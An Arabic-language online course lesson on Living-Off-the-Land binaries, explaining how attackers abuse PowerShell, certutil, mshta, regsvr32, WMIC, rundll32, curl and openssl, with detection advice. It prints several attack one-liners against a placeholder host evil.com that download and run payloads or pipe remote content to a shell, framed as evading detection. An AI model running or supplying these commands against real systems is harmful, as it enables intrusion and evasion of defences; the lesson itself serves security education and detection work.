0Pricing
Cyber Security Academy · درس

الثنائيات المستغلة محليًا (LOLBins)

استخدم ثنائيات Windows الموثوقة (certutil وmshta وregsvr32) لتفادي الاكتشاف

الثنائيات المستغلة محليًا (LOLBins) درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 2 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ما المقصود بـ LOLBins؟

ثنائيات Living-Off-the-Land (LOLBins) هي ثنائيات وأدوات شرعية في نظام التشغيل يعيد المهاجمون توظيفها لتنفيذ إجراءات ضارة. ولأنها أدوات نظام موثوقة وموقعة، فإنها غالبًا ما تتجاوز قوائم السماح بالتطبيقات وتقلل من اكتشافها بواسطة AV/EDR.

لماذا تُعد LOLBins فعالة؟

مزاياها بالنسبة إلى المهاجمين:

  • موجودة دائمًا على الأنظمة المستهدفة — فلا حاجة إلى إسقاط ملفات جديدة
  • موقعة من Microsoft أو Apple — فتتجاوز الاكتشاف القائم على التوقيعات
  • موثوقة لدى حلول قوائم السماح بالتطبيقات
  • تنشئ أشجار عمليات تبدو شرعية

PowerShell بوصفه LOLBin

يُعد PowerShell أكثر LOLBin تعرضًا لإساءة الاستخدام. ويستخدمه المهاجمون من أجل:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe أداة شهادات في Windows يمكنها تنزيل الملفات:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta وwscript

تنفيذ البرامج النصية عبر مضيفات موثوقة:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

يمكن لـ regsvr32.exe تحميل نقاط دخول DLL وتنفيذها من عناوين URL بعيدة عبر علامات /s /n /u /i — متجاوزًا AppLocker ومشغلًا تعليمات برمجية غير موقعة باعتبارها عملية موثوقة:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

تنفيذ WMIC وWMI

تتيح Windows Management Instrumentation تنفيذ التعليمات البرمجية عن بُعد ومحليًا:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

يحمّل rundll32.exe نقاط دخول DLL وينفذها:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

LOLBins في Linux

النظائر في Linux:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS وGTFOBins

قواعد بيانات مرجعية:

  • LOLBAS (lolbas-project.github.io) — ثنائيات Windows والبرامج النصية والمكتبات
  • GTFOBins (gtfobins.github.io) — ثنائيات Linux وmacOS للاستغلال وقراءة الملفات وكتابتها وتصعيد الصلاحيات عبر SUID

اكتشاف إساءة استخدام LOLBin

استراتيجيات الاكتشاف:

  • تسجيل كتل البرامج النصية في PowerShell (EventID 4104) — يسجل الأوامر بعد فك ترميزها
  • Sysmon EventID 1: إنشاء العمليات مع سلسلة العملية الأصل
  • التنبيه عند وجود علاقة أصل-تابع غير متوقعة: Word → PowerShell، Excel → cmd
  • اتصالات شبكية من certutil وmshta وpowershell
  • خطوط أساس UEBA لرصد الاستخدام غير الطبيعي للثنائيات

تحقق سريع: LOLBins

ما ثنائي Windows الذي يمكنه تنزيل ملف بعيد باستخدام العلامة -urlcache؟

مراجعة الدرس

إن LOLBins أدوات شرعية في نظام التشغيل أُعيد توظيفها لأغراض ضارة، ومنها PowerShell وcertutil وmshta وregsvr32 وrundll32 وWMIC في Windows، وcurl وpython وopenssl في Linux. وهي تتجاوز اكتشاف التوقيعات وقوائم السماح بالتطبيقات. ويتطلب اكتشافها تسجيل إنشاء العمليات (Sysmon)، وتسجيل كتل البرامج النصية في PowerShell، وخطوط أساس سلوكية. وتُعد LOLBAS وGTFOBins قاعدتي بيانات مرجعيتين أساسيتين.

الأسئلة الشائعة

هل درس «الثنائيات المستغلة محليًا (LOLBins)» مجاني؟

نعم — نص درس «الثنائيات المستغلة محليًا (LOLBins)» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ماذا ستتعلم في «الثنائيات المستغلة محليًا (LOLBins)»؟

استخدم ثنائيات Windows الموثوقة (certutil وmshta وregsvr32) لتفادي الاكتشاف تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟

لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 2 من أصل 4.

كم من الوقت يستغرق درس «الثنائيات المستغلة محليًا (LOLBins)»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟

نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. أطر C2: Cobalt Strike وSliver
  2. الثنائيات المستغلة محليًا (LOLBins)
  3. تقنيات الحركة الجانبية
  4. كتابة تقارير الفريق الأحمر
← العودة إلى Cyber Security Academy